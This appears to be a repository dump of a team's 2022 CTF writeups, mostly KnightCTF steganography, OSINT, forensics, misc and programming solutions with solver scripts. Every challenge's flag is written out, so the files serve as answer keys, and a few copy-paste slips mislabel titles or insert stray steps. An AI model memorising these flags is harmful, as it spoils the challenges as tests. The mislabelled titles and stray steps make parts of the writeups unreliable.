3 | **Site**: https://ctf.thecybergrabs.org 
4 | 
5 | **Rank**: 3/285
6 | 
7 | ![](screenshot.png)
8 | 


--------------------------------------------------------------------------------
/2022/CybergrabsCTF/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/CybergrabsCTF/screenshot.png


--------------------------------------------------------------------------------
/2022/DefCampCTF/README.md:
--------------------------------------------------------------------------------
1 | # DefCamp CTF 21-22 
2 | 
3 | **Site**: https://dctf21.cyberedu.ro/
4 | 
5 | **Rank**: 18/1035
6 | 
7 | ![](scoreboard.png)
8 | 


--------------------------------------------------------------------------------
/2022/DefCampCTF/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/DefCampCTF/scoreboard.png


--------------------------------------------------------------------------------
/2022/HayyimCTF/README.md:
--------------------------------------------------------------------------------
1 | # Hayyim CTF 2022
2 | 
3 | **Site**: https://ctf.hayyimsecurity.com
4 | 
5 | **Rank**: 12/86
6 | 
7 | ![](scoreboard.png)
8 | 


--------------------------------------------------------------------------------
/2022/HayyimCTF/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/HayyimCTF/scoreboard.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Digital Forensics.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Digital Forensics.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Digital Forensics
2 | 
3 | ![](Digital%20Forensics.png)
4 | 
5 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/Lost Flag .png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/The Lost Flag/Lost Flag .png


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/README.md:
--------------------------------------------------------------------------------
 1 | # The Lost Flag
 2 | 
 3 | **Category**: Digital Forensic \
 4 | **Points**: 25
 5 | 
 6 | ## Description
 7 | 
 8 | > We recovered a image file from an incident. There might be something interesting in the file. Give it a try.
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [Lost Flag.png](Lost%20Flag.png).
14 | 
15 | Just use `stegsolve` and see the Red plane 0.
16 | 
17 | ![](sol.png)
18 | 
19 | # Flag is `KCTF{Y0U_F0uNd_M3}`
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{Y0U_F0uNd_M3}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/The Lost Flag/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/sol.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/The Lost Flag/sol.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/sol.txt:
--------------------------------------------------------------------------------
1 | stegsolve Red plane 0
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/README.md:
--------------------------------------------------------------------------------
 1 | # Unknown File
 2 | 
 3 | **Category**: Digital Forensic \
 4 | **Points**: 50
 5 | 
 6 | ## Description
 7 | 
 8 | > My friend sent me a file & told me there is a flag in it. He dare me to find the flag. But I have no idea what the file is about. Can you help me get the flag?
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [unknown file.zip](unknown file.zip).
14 | 
15 | Unzip the file and got a "unknown file"
16 | 
17 | 
18 | 
19 | Change the Hex signatures of the unknown file(`00 10 56 65` to `89 50 4E 47`).
20 | 
21 | ![](unknown%20file)
22 | 
23 | # Flag is `KCTF{Imag3_H3ad3r_M4nipul4t10N}`
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{Imag3_H3ad3r_M4nipul4t10N}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Unknown File/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/unknown file:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Unknown File/unknown file


--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/unknown file.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Unknown File/unknown file.zip


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/2.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/README.md:
--------------------------------------------------------------------------------
 1 | # Look Closely
 2 | 
 3 | **Category**: Misc \
 4 | **Points**: 100
 5 | 
 6 | ## Description
 7 | 
 8 | > Look closely & try to find the flag from the following.
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [look closely.wav](look%20clodely.wav).
14 | 
15 | Open the wav file using Sonic Visualiser
16 | 
17 | In Layer add Spectogram or press `Shift + G` and you'll see a url but its not readable.
18 | 
19 | Use the settings shown below and the link will be readable.
20 | 
21 | ![](settings.png)
22 | 
23 | Got https://drive.google.com/file/d/1_6c_waS9ijouTpqI_tUO6VCRf7fE6gCY/view
24 | 
25 | In the link I got Watch closely.mp4
26 | 
27 | I watched the video carefully and got two binary code.\
28 | First in [00:10 sec](1.png) and Secound in [00:52 sec](2.png)
29 | 
30 | 
31 | Combine the both binary codes and got `0100101101000011010101000100011001111011010010000011001101001100010011000100111101011111010010100011001101001100010011000100111101111101`
32 | 
33 | [Now, just decode it and got the flag.](https://gchq.github.io/CyberChef/#recipe=From_Binary('Space',8)&input=MDEwMDEwMTEwMTAwMDAxMTAxMDEwMTAwMDEwMDAxMTAwMTExMTAxMTAxMDAxMDAwMDAxMTAwMTEwMTAwMTEwMDAxMDAxMTAwMDEwMDExMTEwMTAxMTExMTAxMDAxMDEwMDAxMTAwMTEwMTAwMTEwMDAxMDAxMTAwMDEwMDExMTEwMTExMTEwMQ)
34 | # Flag is `KCTF{H3LLO_J3LLO}`
35 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{H3LLO_J3LLO}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/look closely.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/look closely.wav


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/settings.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Misc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Misc.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Misc
2 | 
3 | ![](Misc.png)
4 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/README.md:
--------------------------------------------------------------------------------
 1 | # The Hungry Dragon
 2 | 
 3 | **Category**: Misc \
 4 | **Points**: 50
 5 | 
 6 | ## Description
 7 | 
 8 | > Last night, the Knight Squad members were having relax and enjoying doughnuts and sweets together on the roof of their castle. Suddenly, a hungry dragon attacked on them and ate some of their food. The Knights were angry and then they all attacked on the dragon and managed to capture it. And now they are handing over the dragon to you. Can you figure out how many doughnuts and sweets were eaten up by the dragon?
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [The Hungry Dragon.3mf](The%20Hungry%20Dragon.3mf).
14 | 
15 | I searched about `.3mf` file and I got that It's a 3D model.
16 | 
17 | Open the 3d model with https://3dviewer.net/
18 | 
19 | ![](dragon.png)
20 | 
21 | I zoomed inside the dragon and here I can see the eaten doughnuts and sweets.
22 | 
23 | ![](insideDragon.png)
24 | 
25 | Now, zoom-out and right-click on dragon and click on hide mesh now You can see all the eaten doughnuts and sweets.
26 | 
27 | ![](hideDragon.png)
28 | 
29 | # Flag is `KCTF{3_doughnut_and_11_sweet}`
30 | 
31 | 
32 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/The Hungry Dragon.3mf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/The Hungry Dragon.3mf


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/dragon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/dragon.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/hideDragon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/hideDragon.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/insideDragon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/insideDragon.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/The Hungry Dragon/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/The Hungry Dragon/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Canada/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/1que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Canada/1que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Canada/2.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/README.md:
--------------------------------------------------------------------------------
 1 | # Canada Server
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 50
 5 | 
 6 | ## Description
 7 | 
 8 | > Our sponsor NS TechValley had some problems last year. Their Canada server was not working as expected. Can you find the IP address of that server?
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Just google `NS TechValley Canada server was not working `
14 | 
15 | ![](1.png)
16 | 
17 | ![](2.png)
18 | 
19 | # Flag is `KCTF{192.99.167.83}`
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Canada/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{192.99.167.83}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/Explosion_In_Front_Of_Bank_Of_Spain.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/Explosion_In_Front_Of_Bank_Of_Spain.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/README.md:
--------------------------------------------------------------------------------
 1 | # Canada Server
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 100
 5 | 
 6 | ## Description
 7 | 
 8 | > One of my friend sent me the picture and told me that, there was an explotion in front of the Bank of Spain by some robbers a few days ago. After hearing that, I googled about incident. But I discovered that, The picture he gave is not the picture of Bank Of Spain. So, now I want to know the exact location of the picture so that I can know about the incident of that explotion. Can you please help me to find that place? Please send me the coordinates of that location if you can figure it out.
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | Given file is [Explosion_In_Front_Of_Bank_Of_Spain.png](Explosion_In_Front_Of_Bank_Of_Spain.png)
13 | 
14 | Just google `money heist bank of spain location`
15 | 
16 | Got a [result](https://www.klook.com/en-IN/blog/money-heist-film-locations/#:~:text=Rio%E2%80%99s%20illegal%20detention.-,5.%20Ministerio%20de%20Fomento%20(Ministry%20of%20Public%20Works%20and%20Transport)%20as%20the%20Bank%20of%20Spain,-Also%2C%20the%20team)
17 | 
18 | The real name is `Ministerio de Transportes, Movilidad y Agenda Urbana`.
19 | 
20 | search it on google map.
21 | 
22 | The correct coordinates is in end of the google map url.
23 | 
24 | ![](1.png)
25 | 
26 | # Flag is `KCTF{40.4442164,-3.6936083}`
27 | 
28 | 
29 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{40.4442164,-3.6936083}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Explosion In Front Of Bank Of Spain/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Find The Camera/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/Bus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Find The Camera/Bus.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/README.md:
--------------------------------------------------------------------------------
 1 | # Find The Camera
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 100
 5 | 
 6 | ## Description
 7 | 
 8 | > Can you find the manufacturer and the model number of the camera that took the picture of this bus?
 9 | Note: The whole flag is in Upper Case letters and replace any special character or space with underscores.
10 | 
11 | ![](que.png)
12 | ## Solution
13 | Given file is [Bus.png](Bus.png)
14 | 
15 | I got a username/copyright tag on image `JenCH012`
16 | 
17 | By doing many googling I got the image
18 | https://fotobus.msk.ru/photo/267442/?vid=204172
19 | 
20 | In it's Camera Settings I got the model number
21 | 
22 | ![](1.png)
23 | 
24 | By googling the model number and I got that Its brand is sony
25 | 
26 | 
27 | # Flag is `KCTF{SONY_DSC_S980}`
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/Find The Camera/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/Find The Camera/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/OSINT.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/OSINT/OSINT.png


--------------------------------------------------------------------------------
/2022/KnightCTF/OSINT/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | OSINT
2 | 
3 | ![](OSINT.png)
4 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Find The Number/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{1.9999999701976776}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Find The Number/sol.py:
--------------------------------------------------------------------------------
1 | def G_Sum(n):
2 |     if n < 0 :
3 |         return 0
4 |     return 1/(pow(2,n))+G_Sum(n-1)
5 |     
6 | print("KCTF{"+str(G_Sum(25))+"}")
7 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Keep Calculating/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{2666664}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Keep Calculating/sol.py:
--------------------------------------------------------------------------------
1 | x=1
2 | y=x+1
3 | xy=12
4 | answer=0
5 | for i in range(666):
6 |     answer += (x*y) + int(str(x)+str(y))   
7 |     x+=1 
8 | print("KCTF{"+str(answer)+"}")        
9 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Programming.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Programming/Programming.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Programming
2 | 
3 | ![](Programming.png)
4 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Reverse The Answer/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{12252696}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Reverse The Answer/sol.py:
--------------------------------------------------------------------------------
 1 | x=1
 2 | answer = 0
 3 | 
 4 | for i in range(543):
 5 |     calculation = (x*(x+1)) + (2 *(x + 1))
 6 |     reversed_calc = int(str(calculation)[::-1])
 7 |     if reversed_calc % 4 == 0:
 8 |         answer=answer+reversed_calc
 9 |     x+=1    
10 | 
11 | print("KCTF{"+str(answer)+"}")
12 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Something In Common/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{24680}
2 | 
3 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Something In Common/sol.py:
--------------------------------------------------------------------------------
 1 | import math
 2 | 
 3 | a = 21525625
 4 | b = 30135875
 5 | 
 6 | def DigitSum(n):
 7 |     sum = 0
 8 |     for digit in str(n): 
 9 |       sum += int(digit)      
10 |     return sum
11 | 
12 | answer = DigitSum(math.gcd(a, b)) * 1234
13 | print("KCTF{"+str(answer)+"}")
14 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Squre Sum/sol.py:
--------------------------------------------------------------------------------
 1 | def sumSquare(n) :
 2 |     ans = []
 3 |     c = 0
 4 |     i = 1
 5 |     while i * i <= n :
 6 |         j = 1
 7 |         while(j * j <= n) :
 8 |             if (i * i + j * j == n) :
 9 |                 print(i, "^2 + ", j , "^2" )
10 |                 c += 1
11 |                 if c == 3:
12 |                     ans.append(str(i))
13 |                     ans.append(str(j))
14 |             j = j + 1
15 |         i = i + 1
16 |     return ans    
17 | n = 25000
18 | num = sumSquare(n)
19 | print("\n\nKCTF{"+num[0]+","+num[1]+"}")
20 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Programming/Squre Sum/sol.txt:
--------------------------------------------------------------------------------
1 | KCTF{90,130}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF 2022
2 | 
3 | **Site** : https://knightctf.com/
4 | 
5 | **Rank** : 18 / 752
6 | 
7 | ![](scoreboard2.png)
8 | 
9 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/2.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/README.md:
--------------------------------------------------------------------------------
 1 | # FileD
 2 | 
 3 | **Category**: Steganography \
 4 | **Points**: 25
 5 | 
 6 | ## Description
 7 | 
 8 | > Can you see everything?
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | Given file is [filed.kra](filed.kra)
13 | 
14 | I searched about `.kra` file and I got that It's an image file created by Krita painting program.
15 | 
16 | You can download Krita from https://krita.org/en/download/krita-desktop/
17 | 
18 | Open the filed.kra file with Krita application.
19 | 
20 | In it's Camera Settings I got the model number
21 | 
22 | ![](1.png)
23 | 
24 | Hide all the layers except `ctf.png` and got the flag.
25 | 
26 | ![](2.png)
27 | 
28 | # Flag is `KCTF{W00_n1ce_you_got_me}`
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/filed.kra:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/filed.kra


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{W00_n1ce_you_got_me}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/FileD/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/FileD/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow The White Rabbit/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/README.md:
--------------------------------------------------------------------------------
 1 | # Follow The White Rabbit
 2 | 
 3 | **Category**: Steganography \
 4 | **Points**: 25
 5 | 
 6 | ## Description
 7 | 
 8 | > Will you choose to follow the white rabbit like NEO? THINK wisely or LOOK your path deeply before you take step.
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | Given file is [whiterabbit.jpg](whiterabbit.jpg)
13 | 
14 | I saw a morse code below the the rabbit
15 | 
16 | Just decode it https://www.boxentriq.com/code-breaking/morse-code
17 | 
18 | ![](1.png)
19 | 
20 | # Flag is `KCTF{L0OKB4Y0UL34P}`
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{L0OKB4Y0UL34P}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow The White Rabbit/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow The White Rabbit/whiterabbit.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow The White Rabbit/whiterabbit.jpg


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow/1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/Follow.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow/Follow.pdf


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/README.md:
--------------------------------------------------------------------------------
 1 | # Follow
 2 | 
 3 | **Category**: Steganography \
 4 | **Points**: 25
 5 | 
 6 | ## Description
 7 | 
 8 | > Follow the rules ?
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | Given file is [Follow.pdf](Follow.pdf)
13 | 
14 | Open the pdf and a white text hidden in the pdf
15 | 
16 | Just press Ctrl + A to reveal it
17 | 
18 | ![](1.png)
19 | 
20 | # Flag is `KCTF{This_is_the_real_flag}`
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{This_is_the_real_flag}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Follow/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Follow/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/QR_Code_From_The_Future.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/QR_Code_From_The_Future.gif


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/README.md:
--------------------------------------------------------------------------------
 1 | # QR Code From The Future
 2 | 
 3 | **Category**: Steganography \
 4 | **Points**: 25
 5 | 
 6 | ## Description
 7 | 
 8 | > The following file was found in a device from a crashed UFO. Can you solve that mystery?
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | Given file is [QR_Code_From_The_Future.gif](QR_Code_From_The_Future.gif)
13 | 
14 | ![](QR_Code_From_The_Future.gif)
15 | 
16 | It's a gif made with lot of qr code images
17 | 
18 | Run the code below to extract all images from the gif to img folder
19 | 
20 | ```bash
21 | mkdir img && gm convert QR_Code_From_The_Future.gif -coalesce +adjoin ./img/%3d.png
22 | ```
23 | 
24 | I used my qrcan tool(https://github.com/sky9262/qrcan)
25 | 
26 | ```bash
27 | python3 qrcan.py ./img/
28 | ```
29 | 
30 | Got `}pvznalq_bg_pvgngf_zbes_qriybir_gbt_rqbp_ED{SGPX`
31 | 
32 | It looks like reversed rot13
33 | 
34 | [Just decode with cyberchef.](https://gchq.github.io/CyberChef/#recipe=Reverse('Character')ROT13(true,true,false,13)&input=fXB2em5hbHFfYmdfcHZnbmdmX3piZXNfcXJpeWJpcl9nYnRfcnFicF9FRHtTR1BYCg)
35 | 
36 | # Flag is `KCTF{QR_code_got_evolved_from_static_to_dynamic}`
37 | 
38 | 
39 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{QR_code_got_evolved_from_static_to_dynamic}
2 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  0.png:
--------------------------------------------------------------------------------
